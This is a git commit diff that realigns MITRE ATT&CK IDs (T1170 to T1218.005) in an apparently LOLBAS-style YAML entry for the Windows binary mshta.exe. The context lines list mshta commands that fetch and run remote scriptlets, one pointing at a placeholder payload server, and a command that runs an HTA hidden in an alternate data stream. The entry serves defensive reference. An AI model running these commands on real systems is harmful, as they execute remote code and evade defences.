MITRE ATT&CK realignment sprint

2025-07-27 04:32:24 +02:00 · 2021-11-05 18:58:26 +00:00
parent 97f5042a58
commit 4f7ec8d2af
159 changed files with 190 additions and 506 deletions
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@@ -9,32 +9,28 @@ Commands:
    Usecase: Execute code
    Category: Execute
    Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
    Description: Executes VBScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
    Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
    Description: Executes JavaScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
    Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: mshta.exe "C:\ads\file.txt:file.hta"
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code hidden in alternate data stream
    Category: ADS
    Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
 Full_Path:
  - Path: C:\Windows\System32\mshta.exe